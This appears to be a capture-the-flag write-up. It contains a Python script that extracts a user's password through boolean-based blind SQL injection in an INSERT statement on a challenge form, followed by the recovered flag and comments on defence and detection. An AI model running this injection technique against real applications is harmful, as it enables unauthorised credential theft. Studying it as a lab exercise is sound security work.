Tags: sqli 

Rating: 2.0

# Only Exploit Code
```python
import requests
from pwn import *

# Boolean-based blind SQL injection against the CTF challenge's /add form.
# The `username` field is evidently placed into an INSERT statement as text:
# the payload closes the current VALUES tuple, appends a second row whose
# value is chosen by a CASE expression, and comments out the rest of the query.
# Defensive takeaway: binding `username`/`password` as query parameters in the
# /add handler (instead of building the SQL string) removes this class of bug.
url = "http://phish.sf.ctf.so/add"

# Base names for the two values written per request; a counter is appended so
# that every request uses values that have not been inserted before.
user1 = 'aafaz'
user2 = 'baaff'

# Characters confirmed so far, and the running uniqueness counter.
password = ''
d = 6

for i in range(64):  # character positions 1..64 of the target column
    for j in range(32, 126):  # candidate code points 32..125
        suffix = str(d + 1)
        u, p = user1 + suffix, user2 + suffix

        # CASE yields the fresh value `p` only when the (i+1)-th character of
        # the stored password for username "shou" has code point j; otherwise
        # it yields the fixed string "pocas".
        # unicode()/substr() suggest an SQLite backend (not confirmed here).
        payload = f'{u}\'), (\'f\', (select case when (select unicode(substr(password,{i+1},1)) from user where username = "shou") = {j} THEN "{p}" ELSE "pocas" END)) --'

        res = requests.post(
            url,
            data={'username': payload, 'password': 'dummy'},
        ).text

        # One counter step per request, whether or not the guess matched.
        d += 1

        # The script treats this response text as the "guess was right" signal.
        # NOTE(review): why the server answers differently for the two CASE
        # branches is not shown here; presumably a uniqueness constraint.
        if 'Your password is leaked' not in res:
            continue

        password += chr(j)
        log.info('Admin password : {}'.format(password))
        break

# Detection note: this traffic is a long burst of POSTs to /add from one
# client, each with a `username` containing quotes, SELECT/CASE and a trailing
# SQL comment, and a numeric suffix that increases by one per request.

```

# Flag
```
[*] Admin password : we{e0df7105-edcd-4dc6-8349-f3bef83643a9@h0P3_u_didnt_u3e_sq1m4P}
```